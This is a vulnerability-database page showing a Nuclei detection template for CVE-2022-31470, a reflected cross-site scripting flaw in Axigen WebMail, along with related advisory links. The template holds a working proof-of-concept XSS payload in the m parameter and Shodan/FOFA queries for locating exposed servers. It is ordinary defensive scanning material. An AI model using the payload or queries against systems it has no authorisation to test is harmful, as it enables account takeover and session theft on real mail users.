Lucene search
+L

Axigen WebMail - Cross-Site Scripting

🗓️ 27 Jul 2026 04:16:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 45 Views

Axigen WebMail is vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS Vulnerability
11 Sep 202300:00
zdt
GithubExploit
Exploit for Cross-site Scripting in Axigen Axigen_Mobile_Webmail
13 Sep 202305:59
githubexploit
ATTACKERKB
CVE-2022-31470
7 Jun 202221:15
attackerkb
Circl
CVE-2022-31470
8 Jun 202200:31
circl
CNNVD
Axigen Mobile WebMail 跨站脚本漏洞
7 Jun 202200:00
cnnvd
CVE
CVE-2022-31470
7 Jun 202200:00
cve
Cvelist
CVE-2022-31470
7 Jun 202200:00
cvelist
Exploit DB
Axigen < 10.3.3.47_ 10.2.3.12 - Reflected XSS
8 Sep 202300:00
exploitdb
NVD
CVE-2022-31470
7 Jun 202221:15
nvd
OSV
CVE-2022-31470
7 Jun 202221:15
osv
Rows per page
id: CVE-2022-31470

info:
  name: Axigen WebMail - Cross-Site Scripting
  author: AmirZargham
  severity: medium
  description: |
    Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
  impact: |
    Attackers can craft malicious URLs with JavaScript in the m parameter that executes when users access the link, potentially stealing session cookies, credentials, or performing unauthorized actions in the victim's Axigen WebMail account.
  remediation: |
    Update Axigen WebMail to a version later than 10.5.0-4370c946 that properly sanitizes and encodes the m parameter.
  reference:
    - https://www.axigen.com/
    - https://www.exploit-db.com/exploits/51722
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31470
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-31470
    cwe-id: CWE-79
    epss-score: 0.52088
    epss-percentile: 0.98845
    cpe: cpe:2.3:a:axigen:webmail:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: axigen
    product: webmail
    shodan-query: title:"Axigen"
    fofa-query: title="Axigen"
  tags: cve,cve2022,axigen,webmail,xss,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "Axigen WebMail"
          - 'AXI-SCRIPT'
          - 'axigen-web-fonts'
          - 'AXIWMRememberLogin'
        internal: true
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/index.hsp?m=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022026310dfd2b261e8506135721839a4e799fe1fba218c6723500fac8eccfed0355022100ac56b43def501b20b90551974253b7dc5de36a7a76f5ff245ee75749f2e3e633:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.52088
45